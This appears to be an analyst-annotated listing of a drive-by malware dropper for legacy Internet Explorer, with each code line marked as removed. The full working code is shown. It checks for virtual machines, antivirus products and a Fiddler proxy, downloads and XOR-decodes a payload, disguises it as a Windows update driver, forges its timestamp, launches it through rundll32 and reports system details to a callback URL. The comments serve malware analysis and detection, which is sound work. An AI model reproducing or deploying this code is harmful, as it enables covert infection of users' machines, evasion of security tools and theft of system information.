// Analyst note: configuration globals and VBScript helpers of a script that
// targets legacy Internet Explorer (JScript, ActiveX, execScript). The listing
// below fetches an encoded file, decodes it to disk and launches it via rundll32.
// The two writes emit a closing </textarea> and an opening HTML comment,
// presumably to hide the rest of the hosting page's markup (not shown here).
- document.write('</textarea>');
- document.write('<!--');
- var g_lav = 'cc,bb'; // av_identifier() codes for which avunlock_identifier() returns 0
- var g_lwork = 1; // lets Start() proceed even when intlvl_identifier() returns 0
- var g_ft = 1; // first argument of getWmiProcessAlive(): 1 = match on CommandLine
- var g_ts = 0; // 't' argument of SaveDecodedFile(): 0 = timestamp rewrite disabled
- var g_uf = '/relax/nalogi/5/PYDRFKIP/5fead4b805bc468e6a4008be28c6ca6a'; // path requested by ReadFileUrl()
- var g_xk = '97dc6e7aaa9c089d0ed82ebfd9fca4fe'; // repeating XOR key used by SaveDecodedFile()
- var g_cb = '/sro/regions/'; // URL prefix for the status reports sent from f_close()
- var g_fn = 'Windows6.1-KB6928566-x86.drv'; // name of the file written to disk and then launched
- var g_tca = 5000; // delay in ms before checkAliveProcess() runs
- var g_av; // code returned by av_identifier()
- var g_path; // directory chosen by CreateFile()
- var g_pc = 0; // result of pc_identifier()
- var g_avun = 0; // result of avunlock_identifier()
- var g_run = 0; // result of the launch attempt in runSoft()
- var g_alive = 0; // result of getWmiProcessAlive()
- var g_ulvl = 0; // result of intlvl_identifier()
- var g_err = '0'; // status string; each catch appends a letter tag plus (e.number & 0xFFFF)
- var g_runt = new Date().getTime(); // script start time in ms; postData() turns it into a negative elapsed time
- var g_try = 2; // counter decremented in checkAliveProcess()
- var g_tryd = 5; // not referenced anywhere else in this listing
// VBScript helpers: f_chr wraps chr(); ieRawBytes converts a byte array with CStr();
// ieLastChr returns the final byte as a character when the byte length is odd, else "".
- window.execScript('function f_chr(c):f_chr=chr(c):end function', 'vbscript');
- window.execScript('function ieRawBytes(byteArray):ieRawBytes=CStr(byteArray):end function', 'vbscript');
- window.execScript('function ieLastChr(byteArray):Dim lastIndex:lastIndex=LenB(byteArray):if lastIndex mod 2 Then:ieLastChr=Chr(AscB(MidB(byteArray,lastIndex,1))):Else:ieLastChr="":End If:end function', 'vbscript');
// Walks a collection with the JScript Enumerator object and calls Do(item) for
// each element; iteration stops as soon as Do returns a truthy value.
// Items: collection to enumerate. Do: callback taking the current item.
- function ForEachItem(Items, Do) {
- with(new Enumerator(Items)) for (; !atEnd(); moveNext())
- if (Do(item())) break;
- }
// Creates the COM objects the rest of the script depends on: a shell, an HTTP
// client, a binary stream, a WMI locator and a file-system object. A page that
// instantiates this set is a strong review signal for defenders.
// If any creation throws, the error is tagged 'a' and f_close(1) reports it.
- try {
- var aws = new ActiveXObject('WScript.Shell');
- var amx = new ActiveXObject('Microsoft.XMLHTTP');
- var aas = new ActiveXObject('ADODB.Stream'); // not referenced again in this listing
- var wmi = new ActiveXObject('WbemScripting.SWbemLocator');
- var sfo = new ActiveXObject('Scripting.FileSystemObject');
- } catch (e) {
- g_err += 'a' + (e.number & 0xFFFF);
- f_close(1);
- }
// Reports the outcome to the g_cb endpoint and then closes the window.
// r truthy: the status string is sent as an iframe URL (g_cb + g_err + '/00000/').
// r falsy: the status flags and AV code are appended to g_err, and the security
// product names plus the computer model are POSTed after obfuscateData().
// The finally branch schedules close() after 2000 ms in either case.
- function f_close(r) {
- try {
- if (r) {
- var x = document.createElement('iframe');
- x.setAttribute('src', g_cb + g_err + '/00000/');
- document.body.appendChild(x);
- } else {
- g_err += '/' + g_pc + '' + g_avun + '' + g_run + '' + g_alive + '' + g_ulvl + '/' + g_av;
- postData(g_cb + g_err, obfuscateData(getWmiSC() + '\r\nModel=' + getWmiModel()));
- }
- } finally {
- setTimeout(function() {
- close()
- }, 2000);
- }
- }
// Lists the security products registered with Windows Security Center.
// For each of the three product classes it queries root\SecurityCenter2, falling
// back to root\SecurityCenter, and appends the class name and every displayName.
// Returns the text (CRLF separated), or false after tagging the error with 'b'.
// NOTE(review): c is a JScript Array handed to Enumerator via ForEachItem;
// whether that enumerates or throws is not established by this listing.
- function getWmiSC() {
- try {
- var r = '';
- var c = new Array('AntiSpywareProduct', 'AntiVirusProduct', 'FirewallProduct');
- ForEachItem(c, function(l) {
- try {
- var j = wmi.ConnectServer('.', 'root\\SecurityCenter2').InstancesOf(l)
- } catch (e) {
- var j = wmi.ConnectServer('.', 'root\\SecurityCenter').InstancesOf(l)
- }
- r += l + '\r\n';
- ForEachItem(j, function(o) {
- r += o.displayName + '\r\n';
- });
- });
- } catch (e) {
- g_err += 'b' + (e.number & 0xFFFF);
- return !1;
- }
- return r;
- };
// Reads the Model property of Win32_ComputerSystem through WMI (root\CIMV2).
// Returns the model string (the last instance wins), or false after tagging the
// error with 'c'. The value feeds pc_identifier() and the report in f_close().
- function getWmiModel() {
- try {
- var r = '';
- var a = wmi.ConnectServer('.', 'root\\CIMV2').InstancesOf('Win32_ComputerSystem');
- ForEachItem(a, function(i) {
- r = i.Model;
- });
- } catch (e) {
- g_err += 'c' + (e.number & 0xFFFF);
- return !1;
- }
- return r;
- }
// Collects the lower-cased Name of every Win32_Process instance.
// Returns an array of process names, or false after tagging the error with 'd'.
// The list is consumed by av_identifier().
- function getWmiProcessList() {
- try {
- var r = new Array();
- var a = wmi.ConnectServer('.', 'root\\CIMV2').InstancesOf('Win32_Process');
- ForEachItem(a, function(i) {
- r.push((i.Name).toLowerCase());
- });
- } catch (e) {
- g_err += 'd' + (e.number & 0xFFFF);
- return !1;
- }
- return r;
- }
// Checks whether a running process references p.
// b truthy: looks for p inside each process CommandLine.
// b falsy: looks for p (case-insensitive) inside each process Name.
// Returns 1 on a match, otherwise 0; a WMI error is tagged 'e' and yields 0.
// The FileExists test at the end only re-assigns 1 when r is already truthy, so it
// does not change the result.
- function getWmiProcessAlive(b, p) {
- var r = 0;
- try {
- var a = wmi.ConnectServer('.', 'root\\CIMV2').InstancesOf('Win32_Process');
- ForEachItem(a, function(i) {
- if (b) {
- if (((String)(i.CommandLine).indexOf(p)) + 1) {
- r = 1;
- }
- } else {
- if ((String)(i.Name).toLowerCase().indexOf(p.toLowerCase()) + 1) {
- r = 1;
- }
- }
- });
- } catch (e) {
- g_err += 'e' + (e.number & 0xFFFF);
- var r = 0;
- }
- if (sfo.FileExists(p) && r) {
- r = 1;
- }
- return r;
- }
// Launches the file at path p through WMI Win32_Process.Create.
// It first adds 'sedebugprivilege' to the WMI security settings, then builds a
// rundll32 command line that calls ShellExec_RunDLL to start a second rundll32
// on p with the DllRegisterServer export.
// Returns 1 when Create yields a ProcessId, otherwise 0 (errors tagged 'f').
// Detection note: the command line 'rundll32 SHELL32.dll,ShellExec_RunDLL rundll32
// "...",DllRegisterServer' pointing at a .drv file in a user-writable directory is
// a usable process-creation indicator; WMI-created processes typically appear
// under the WMI provider host rather than the browser.
- function startWmiProcess(p) {
- try {
- wmi.Security_.privileges.addasstring('sedebugprivilege', !0);
- var a = wmi.ConnectServer('.', 'root\\CIMV2');
- var b = a.Get('Win32_Process').Methods_('Create').inParameters.SpawnInstance_();
- var c = a.Get('Win32_ProcessStartup').SpawnInstance_();
- c.ShowWindow = 12; // meaning of the value 12 is not established by this listing
- b.Properties_.Item('CommandLine').Value = aws.ExpandEnvironmentStrings('rundll32 SHELL32.dll,ShellExec_RunDLL rundll32 "' + p + '",DllRegisterServer');
- b.Properties_.Item('ProcessStartupInformation').Value = c;
- return ((a.ExecMethod('Win32_Process', 'Create', b).ProcessId) ? 1 : 0);
- } catch (e) {
- g_err += 'f' + (e.number & 0xFFFF);
- return 0;
- }
- }
// Launches the file at path p with WScript.Shell.Run, using the same rundll32
// command line as startWmiProcess(). The arguments 0, 0 request a hidden window
// and no wait for completion.
// Returns 1 when Run(...) + 1 is truthy, otherwise 0; a thrown error is tagged 'g'.
- function startProcess(p) {
- try {
- return ((aws.Run(aws.ExpandEnvironmentStrings('rundll32 SHELL32.dll,ShellExec_RunDLL rundll32 "' + p + '",DllRegisterServer'), 0, 0) + 1) ? 1 : 0);
- } catch (e) {
- g_err += 'g' + (e.number & 0xFFFF);
- return 0;
- }
- }
// Requests URL u with Microsoft.XMLHTTP. The third argument of open() is false,
// i.e. a synchronous GET; checkCompleteDownload handles the response.
// Returns true when the request was issued, false after tagging the error with 'h'.
- function ReadFileUrl(u) {
- try {
- amx.open('GET', u, !1);
- amx.onreadystatechange = checkCompleteDownload;
- amx.send();
- return !0;
- } catch (e) {
- g_err += 'h' + (e.number & 0xFFFF);
- return !1;
- }
- }
// readystatechange handler for the download. Once the request has completed with
// HTTP 200, the response body is decoded and written to disk as g_fn using key
// g_xk; on success the file is launched via runSoft(), on failure f_close() reports.
// A completed response with any other status is ignored here.
- function checkCompleteDownload() {
- if (amx.readyState == 4 && amx.status == 200) {
- if (SaveDecodedFile(amx.responseBody, g_fn, g_xk, g_ts)) {
- amx.abort();
- runSoft();
- } else {
- f_close();
- }
- }
- }
// Returns an integer in the inclusive range [a, b] drawn from Math.random().
// Used for the randomized delays and for the timestamp offset in newTimeStamp().
- function getRandom(a, b) {
- return ((Math.random() * (b - a + 1)) | 0) + a;
- }
// Builds a randomized past timestamp: the current Unix time in seconds minus a
// random value in [0, today & 0xFFFFFF], plus 1000.
// Returns it as an array of four byte values, most significant byte first.
// SaveDecodedFile() consumes the array when its 't' flag is set.
- function newTimeStamp() {
- var today = (new Date().getTime() / 1000 | 0);
- var newday = today - getRandom(0, today & 0xFFFFFF) + 1000;
- var result = function() {
- for (var i = 3, r = Array(); 0 <= i; i--) {
- r.push(((newday / Math.pow(0x100, i)) | 0) & 0xFF);
- }
- return r;
- }();
- return result;
- }
// Creates (overwriting) a file named p in the first writable candidate directory
// and records that directory in g_path.
// The candidate list depends on g_ulvl: profile/system locations when it is set,
// LocalLow locations otherwise; %tmp% is the final fallback.
// Returns the open text-file object, or false after tagging the error with 'i'.
// Detection note: the directory list below combined with the g_fn file name gives
// the on-disk locations to sweep during response.
- function CreateFile(p) {
- try {
- var f, Paths = (g_ulvl) ? ['%commonprogramfiles%\\System\\', '%allusersprofile%\\Microsoft\\Windows\\', '%allusersprofile%\\', '%appdata%\\Microsoft\\', '%userprofile%\\', '%tmp%\\Low\\'] : ['%appdata%\\..\\LocalLow\\', '%userprofile\\AppData\\LocalLow\\'];
- for (var i = 0, c = Paths.length; i < c; i++) {
- try {
- g_path = aws.ExpandEnvironmentStrings(Paths[i]);
- f = sfo.CreateTextFile(g_path + p, !0);
- Paths.length = 0;
- return f;
- } catch (e) {
- g_path = 0; // this directory was not usable; try the next one
- continue;
- }
- }
- Paths.length = 0;
- if (!g_path) {
- g_path = aws.ExpandEnvironmentStrings('%tmp%\\');
- return sfo.CreateTextFile(g_path + p, !0);
- }
- } catch (e) {
- g_err += 'i' + (e.number & 0xFFFF);
- return !1;
- }
- }
// Decodes the downloaded body and writes it to the file created by CreateFile(p).
// c: response body (byte array), p: file name, k: key string, t: timestamp flag.
// Decoding is a repeating-key XOR in which a byte is left unchanged when it is 0
// or equal to the key byte at that position; analysts can reverse it with the same
// rule and the g_xk value.
// When t is truthy, the bytes at offsets 60 and 61 are read as a 16-bit value, 8 is
// added, and the four bytes from that position on are replaced with the value from
// newTimeStamp(). Those offsets match the PE header pointer and the COFF timestamp
// field, so this presumably randomizes the file's build timestamp — confirm on a sample.
// Returns true on success, false after tagging the error with 'j'.
- function SaveDecodedFile(c, p, k, t) {
- try {
- var file = CreateFile(p);
- if (!file) {
- return !1;
- }
// Lookup table from every 16-bit character to the two single-byte characters it packs.
- var byteMapping = {};
- for (var i = 0; i < 256; i++) {
- for (var j = 0; j < 256; j++) {
- byteMapping[String.fromCharCode(i + j * 256)] = String.fromCharCode(i) + String.fromCharCode(j);
- }
- };
// Expands the CStr() form of the byte array into one character per byte; the
// VBScript helper supplies the trailing byte when the length is odd.
- var getBytes = function(byteArray) {
- var rawBytes = ieRawBytes(byteArray),
- lastChr = ieLastChr(byteArray);
- return rawBytes.replace(/[\s\S]/g, function(match) {
- return byteMapping[match];
- }) + lastChr;
- };
- var bytes = getBytes(c),
- bytelen = bytes.length,
- keylen = k.length;
- var code, xor, key, output = [],
- j = 0;
- var timestamp_firstbyte, timestamp_position, timestamp_bytes = 4,
- timestamp_today = newTimeStamp();
- for (var i = 0; i < bytelen; i++) {
- code = bytes.charCodeAt(i);
- key = k.charCodeAt(i % keylen);
- xor = (code != 0 && code != key) ? code ^ key : code;
- if (t) {
- if (i == 60) {
- timestamp_firstbyte = xor;
- } else if (i == 61) {
- timestamp_position = (xor * 256 + timestamp_firstbyte) + 8;
- }
- if (0 < timestamp_bytes && 0 < timestamp_position && timestamp_position <= i) {
- timestamp_bytes--;
- xor = timestamp_today[timestamp_bytes];
- }
- }
// Values above 127 go through the VBScript chr() helper instead of String.fromCharCode.
- output[j++] = ((127 < xor) ? f_chr(xor) : String.fromCharCode(xor));
// Flush to disk in 1024-character chunks.
- if (j == 1024) {
- file.Write(output.join(''));
- output = [];
- j = 0;
- }
- }
- file.Write(output.join(''));
- file.Close();
- return !0;
- } catch (e) {
- g_err += 'j' + (e.number & 0xFFFF);
- return !1;
- }
- return !0;
- }
// Sends d to URL u as a synchronous form-encoded POST.
// g_runt is reduced by the current time first, so the field name in the body is
// the negated elapsed time in ms since the script started: '<g_runt>=<d>'.
// Returns true when the request was sent, false after tagging the error with 'k'.
- function postData(u, d) {
- try {
- g_runt -= new Date().getTime();
- amx.Open('POST', u, !1);
- amx.setRequestHeader('Content-Type', 'application/x-www-form-urlencoded');
- amx.Send(g_runt + '=' + d);
- } catch (e) {
- g_err += 'k' + (e.number & 0xFFFF);
- return !1;
- }
- return !0;
- }
// Shifts every character code of d up by 2 and URI-encodes the result.
// Returns the encoded string, or false after tagging the error with 'l'.
// Analysis note: captured report bodies can be read by URI-decoding and then
// subtracting 2 from each character code.
- function obfuscateData(d) {
- try {
- for (var i = 0, data = '', l = d.length; i < l; i++) {
- data += String.fromCharCode(d.charCodeAt(i) + 2);
- }
- } catch (e) {
- g_err += 'l' + (e.number & 0xFFFF);
- return !1;
- }
- return encodeURIComponent(data);
- }
// Maps the running-process list p to a two-character security-product code.
// p: array of lower-cased process names (getWmiProcessList()), or a falsy value.
// avlist holds 'code:process' pairs; the first pair whose ',<process>.exe' occurs
// in the comma-joined list determines the returned code.
// Returns '00' when p is falsy or an error occurs, and ' ' when nothing matches.
// The code is compared with g_lav in avunlock_identifier() and appended to the
// status string reported by f_close().
- function av_identifier(p) {
- try {
- if (!p) {
- return '00';
- }
- var avlist = 'aa:avastsvc,bb:avp,cc:ekrn,cc:nod32krn,dd:mctray,dd:mcsvhost,ee:cmdagent,ff:ccsvchst,gg:psctrls,hh:avgwdsvc,hh:avgcsrvx,ii:msseces,jj:sched,kk:fshoster32,ll:gdfwsvc,mm:bdagent,nn:n360,oo:nav,pp:nis,pp:ns,qq:coreserviceshell,rr:acs,ss:dwservice,ss:dwengine,tt:pfsvc,uu:iswsvc,vv:pctssvc,vv:tfservice,ww:jpf,xx:adawareservice,yy:arcamainsv,zz:savservice,zz:savadminservice,11:tpmgma,22:npsvc32,33:inort,44:rsmgrsvc,55:guardxservice,66:solosent,66:solocfg,77:bullguardbhvscanner,88:k7tsmngr,99:qhactivedefense,ab:bhipssvc,ac:sbamcommandlinescanner,ac:sbamtray,ac:sbamsvc,ad:mbamservice,ae:semsvc,af:icrcservice,af:osceintegrationservice,af:pccntmon'.split(',');
- p = p.join(',');
- for (var i = 0, il = avlist.length, av; i < il; i++) {
- av = avlist[i].split(':');
- if ((p.indexOf(',' + av[1] + '.exe')) + 1) {
- avlist.length = 0;
- return av[0];
- }
- }
- } catch (e) {
- return '00';
- }
- return ' ';
- }
// Virtual-machine check on the computer model string m.
// Returns 0 when m is falsy, when it matches 'virtual', 'bochs' or
// 'microsoft corporation' (case-insensitive), or on error; returns 1 otherwise.
// Start() only continues when the result is 1, so analysis hosts whose model
// string matches these words will see the script stop before the download.
- function pc_identifier(m) {
- try {
- if (!m) {
- return 0;
- }
- var vbx = '(virtual|bochs|microsoft corporation)';
- vbx = 1 ^ (new RegExp(vbx, 'gi').test(m));
- return vbx;
- } catch (e) {
- return 0;
- }
- }
// Decides whether the detected security product allows the script to continue.
// Returns 0 when g_av is falsy or its code occurs in g_lav, otherwise 1.
- function avunlock_identifier() {
- if (!g_av) {
- return 0;
- }
- if ((g_lav.indexOf(g_av)) + 1) {
- return 0;
- }
- return 1;
- }
// Integrity-level heuristic based on the temporary folder path.
// GetSpecialFolder(2) is the FileSystemObject temporary folder; a path ending in
// 'low' yields 0, any other path yields 1, and an error yields 0.
// NOTE(review): a temp path ending in 'Low' presumably indicates a low-integrity
// (Protected Mode) browser process — confirm.
- function intlvl_identifier() {
- try {
- var dt = String(sfo.GetSpecialFolder(2)).toLowerCase();
- return ((dt.substr(dt.length - 3, 3) != 'low') ? 1 : 0);
- } catch (e) {
- return 0;
- }
- }
// Deletes the written file (g_path + g_fn). A failure is tagged 'l', the same
// letter obfuscateData() uses, so the two error sources cannot be told apart in
// the reported status string.
- function deleteSoft() {
- try {
- sfo.DeleteFile(g_path + g_fn);
- } catch (e) {
- g_err += 'l' + (e.number & 0xFFFF);
- }
- }
// Timer callback that runs g_tca ms after a launch attempt.
// It records whether a process referencing g_fn is running and decrements g_try.
// While g_try is non-zero: a live process ends the run with a report, otherwise
// the launch is retried. When g_try reaches zero the file is deleted and the
// outcome reported. The parameter d is unused.
- function checkAliveProcess(d) {
- g_alive = getWmiProcessAlive(g_ft, g_fn);
- if (--g_try) {
- if (g_alive) {
- f_close();
- } else {
- runSoft();
- }
- } else {
- deleteSoft();
- f_close();
- }
- }
// Launches the written file: through WMI when g_ulvl is set, otherwise through
// WScript.Shell, with WScript.Shell as the fallback when the first attempt fails.
// A successful launch schedules checkAliveProcess after g_tca ms; a failed one
// goes straight to the report in f_close().
- function runSoft() {
- g_run = ((g_ulvl) ? startWmiProcess(g_path + g_fn) : startProcess(g_path + g_fn));
- if (!g_run) {
- g_run = startProcess(g_path + g_fn);
- }
- if (g_run) {
- setTimeout(checkAliveProcess, g_tca);
- } else {
- f_close();
- }
- }
// Start(): gathers the environment flags and decides whether to download.
// The download of g_uf happens only when the VM check passed (g_pc), the detected
// security product is not listed in g_lav (g_avun), and either the integrity
// heuristic returned 1 (g_ulvl) or g_lwork is set. Every other path ends in the
// report sent by f_close().
- function Start() {
- g_pc = pc_identifier(getWmiModel());
- g_av = av_identifier(getWmiProcessList());
- g_avun = avunlock_identifier();
- g_ulvl = intlvl_identifier();
- if (g_pc && g_avun && (g_ulvl || g_lwork)) {
- if (!ReadFileUrl(g_uf)) {
- f_close();
- }
- } else {
- f_close();
- }
// The closing brace of Start() shares the next line with the chkFiddler function
// expression, which is invoked immediately.
// chkFiddler: loads http://cdn.technet.microsoft.com in an iframe and inspects the
// loaded frame for the word 'Fiddler', apparently to detect an intercepting debug
// proxy. Only browsers exposing attachEvent but not addEventListener register the
// handler and the fallback timer; elsewhere the iframe is appended and Start() is
// never scheduled.
// No 'Fiddler' in the frame: the fallback timer is cancelled and Start() runs after
// a random 3-10 s delay. 'Fiddler' found: g_err is prefixed with 'fdlr' and the run
// ends with a report. If onload never fires, Start() runs after 10-15 s.
- }(function chkFiddler() {
- var x = document.createElement('iframe'),
- tmrout;
- x.setAttribute('src', 'http://cdn.technet.microsoft.com');
- x.setAttribute('id', 'tstfdlr');
- if (x.attachEvent && !x.addEventListener) {
- tmrout = setTimeout(Start, getRandom(10000, 15000));
- x.attachEvent('onload', (function() {
- if ((document.frames('tstfdlr').document.activeElement.innerHTML).indexOf('Fiddler') == -1) {
- clearTimeout(tmrout);
- setTimeout(Start, getRandom(3000, 10000));
- } else {
- g_err = 'fdlr' + g_err;
- f_close();
- }
- }));
- }
- document.body.appendChild(x);
- })();